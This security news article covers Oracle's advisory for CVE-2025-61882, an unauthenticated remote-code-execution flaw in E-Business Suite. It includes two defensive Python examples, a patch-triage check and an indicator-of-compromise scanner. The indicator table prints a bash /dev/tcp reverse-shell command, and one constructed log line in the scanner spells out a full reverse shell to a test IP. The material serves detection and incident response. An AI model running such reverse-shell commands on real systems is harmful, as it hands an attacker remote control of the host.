Redazione RHC: 5 October 2025 21:29
Oracle has published a security advisory regarding a critical vulnerability identified as CVE-2025-61882 in the Oracle E-Business Suite. The flaw can be exploited remotely without authentication, potentially allowing malicious code to be executed on affected systems.
The company recommends that its customers immediately apply the updates outlined in the advisory. Oracle emphasizes the importance of maintaining actively supported product versions and installing all critical security patches promptly. In particular, the critical patch updates released in October 2023 must already be applied before the new fixes can be installed.
To support immediate detection and containment of potential attacks, the alert includes a risk matrix with indicators of compromise, such as suspicious IP addresses, commands, and files associated with known exploits.
The vulnerability specifically affects Oracle E-Business Suite versions 12.2.3 through 12.2.14. The official documentation, available through the links provided by Oracle, contains detailed information about the patches and how to install them.

Affected products and versions | Patch Availability Document |
---|---|
Oracle E-Business Suite, versions 12.2.3–12.2.14 | Oracle E-Business Suite |
Patches provided through the Security Alert program are available only for versions covered by Premier Support or Extended Support under Oracle’s Lifetime Support Policy.
Versions not included in these programs are not tested for reported vulnerabilities, even though they may still be affected. For this reason, Oracle recommends upgrading to supported versions to ensure protection and compatibility with security patches.
CVE-2025-61882 affects Oracle E-Business Suite and is remotely exploitable without authentication, potentially resulting in remote code execution if successfully exploited.
A public detection method has been published on GitHub that helps identify potentially outdated instances. The method flags an instance as suspicious when the page returns the string “E-Business Suite Home Page” and the HTTP Last-Modified header reports a date before October 4, 2025 (Unix timestamp 1759602752).
This approach is described as a detection tool, not an attack vector, and should be used for verification and defense purposes only. To mitigate the risk, Oracle recommends applying the patches outlined in the security advisory and updating to supported versions.
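The two signals described above can be turned into a small triage check for an organization's own EBS instances. The code below is an added example, not Oracle's advisory material or the GitHub tool's own code; it assumes only the marker string and the Unix timestamp quoted above, and the HTTP responses it classifies are constructed for the example rather than captured from any host.

```python
"""Added example: classify an Oracle EBS instance from an HTTP response
using the two signals described in the text (page marker string and the
Last-Modified header). Not the GitHub tool's code; sample responses are
constructed for the example."""
from datetime import timezone
from email.utils import parsedate_to_datetime
import urllib.request

CUTOFF_TS = 1759602752                 # Unix timestamp cited for 4 October 2025
MARKER = "E-Business Suite Home Page"  # page string cited by the method


def parse_http_date(value):
    """Parse an HTTP-date header value into an aware datetime; None if missing or invalid."""
    if not value:
        return None
    try:
        dt = parsedate_to_datetime(value)
    except (TypeError, ValueError, IndexError):
        return None
    # Dates written with "-0000" come back naive; treat them as UTC.
    return dt if dt.tzinfo else dt.replace(tzinfo=timezone.utc)


def classify(headers, body, cutoff_ts=CUTOFF_TS):
    """Return 'not-ebs', 'unknown', 'suspect' or 'likely-patched'.

    Both signals must be present before an instance is flagged. A missing or
    unparsable Last-Modified header is reported as 'unknown' so that it is
    queued for a manual check instead of being silently treated as patched.
    """
    if MARKER not in body:
        return "not-ebs"
    lower = {k.lower(): v for k, v in headers.items()}
    lm = parse_http_date(lower.get("last-modified"))
    if lm is None:
        return "unknown"
    return "suspect" if lm.timestamp() < cutoff_ts else "likely-patched"


def check_url(url, timeout=10):
    """Fetch one of your own EBS URLs and classify it (network call; not exercised offline)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read(200_000).decode("utf-8", "replace")
        return classify(dict(resp.headers.items()), body)


# Constructed sample responses (headers, body); these are not real hosts.
SAMPLES = {
    "old":     ({"Last-Modified": "Tue, 12 Aug 2025 10:00:00 GMT"}, "<title>E-Business Suite Home Page</title>"),
    "recent":  ({"Last-Modified": "Mon, 06 Oct 2025 09:00:00 GMT"}, "<title>E-Business Suite Home Page</title>"),
    "no-date": ({}, "<title>E-Business Suite Home Page</title>"),
    "other":   ({"Last-Modified": "Tue, 12 Aug 2025 10:00:00 GMT"}, "<title>Welcome</title>"),
}

if __name__ == "__main__":
    for name, (hdrs, body) in SAMPLES.items():
        print(f"{name:8s} -> {classify(hdrs, body)}")
```

Treat the result as triage rather than proof: Last-Modified describes the page the server happened to send, and a reverse proxy or cache can rewrite it, so a "suspect" verdict should be confirmed against the instance's actual patch inventory, and an "unknown" verdict should never be read as "patched".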
Below are indicators of compromise (IP addresses, observed commands, and files) to support immediate detection, investigation, and containment.
Indicator | Type | Description |
---|---|---|
200[.]107[.]207[.]26 | IP address | Potential GET and POST activity |
185[.]181[.]60[.]11 | IP address | Potential GET and POST activity |
sh -c /bin/bash -i >& /dev/tcp//0>&1 | Command | Establish an outgoing TCP connection on a specific port |
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
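The indicators in the table are only useful once they are run against your own telemetry. The code below is an added example, not part of the advisory: it refangs the two IP indicators, looks for the `/dev/tcp/` redirection that characterises the command indicator (whose host and port are stripped in the advisory), and compares SHA-256 hashes against the three file indicators. The log lines, the 192.0.2.10 host and the file contents in it are constructed for the example.

```python
"""Added example: match the advisory's indicators of compromise against
constructed web-access and audit log lines and against file hashes.
The indicator values come from the table; the log lines, the 192.0.2.10
host (TEST-NET range) and the file contents are constructed."""
import hashlib
import re

IOC_IPS_DEFANGED = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}
# The advisory's command indicator has its host and port stripped, so the
# stable part to detect is the bash /dev/tcp/<host>/<port> redirection.
DEV_TCP_RE = re.compile(r"/dev/tcp/[^/\s]+/\d+")


def refang(ip):
    """Turn a defanged indicator such as 203[.]0[.]113[.]5 back into a matchable IP."""
    return ip.replace("[.]", ".")


IOC_IPS = {refang(ip) for ip in IOC_IPS_DEFANGED}
# Anchor each IP so that 203.0.113.5 does not match inside 203.0.113.50.
IOC_IP_RES = {ip: re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])") for ip in IOC_IPS}


def scan_log_line(line):
    """Return a list of (indicator_type, value) hits found in one log line."""
    hits = []
    for ip, pattern in sorted(IOC_IP_RES.items()):
        if pattern.search(line):
            hits.append(("ip", ip))
    m = DEV_TCP_RE.search(line)
    if m:
        hits.append(("command", m.group(0)))
    return hits


def scan_log(lines):
    """Map line index -> hits for every line that matched at least one indicator."""
    result = {}
    for i, line in enumerate(lines):
        hits = scan_log_line(line)
        if hits:
            result[i] = hits
    return result


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def match_hashes(named_blobs):
    """Hash file contents and return {name: digest} for those listed as indicators."""
    return {name: sha256_of(b) for name, b in named_blobs.items() if sha256_of(b) in IOC_SHA256}


def match_hash_list(digests):
    """Intersect already-computed digests (e.g. from an EDR export) with the indicator set."""
    return {d.lower() for d in digests} & IOC_SHA256


# Constructed sample lines: two access-log entries from the indicator IPs,
# two benign entries, and one auditd-style EXECVE record with a /dev/tcp command.
SAMPLE_LOG_LINES = [
    '200.107.207.26 - - [04/Oct/2025:02:11:09 +0000] "POST / HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/Oct/2025:02:11:10 +0000] "GET / HTTP/1.1" 200 8421',
    '185.181.60.11 - - [04/Oct/2025:02:12:41 +0000] "GET / HTTP/1.1" 200 8421',
    'type=EXECVE msg=audit(1759543000.123:4471): argc=3 a0="sh" a1="-c" a2="/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"',
    '1200.107.207.26 - - [04/Oct/2025:02:13:00 +0000] "GET / HTTP/1.1" 200 8421',
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG_LINES).items():
        print(idx, hits)
    print(match_hashes({"constructed.txt": b"constructed file content"}))
```

The IP patterns are deliberately anchored so that a longer octet string does not produce a false hit, and hash matching is offered both on raw contents and on pre-computed digests, since in practice the digests usually arrive from an EDR or file-integrity export rather than from re-reading the files.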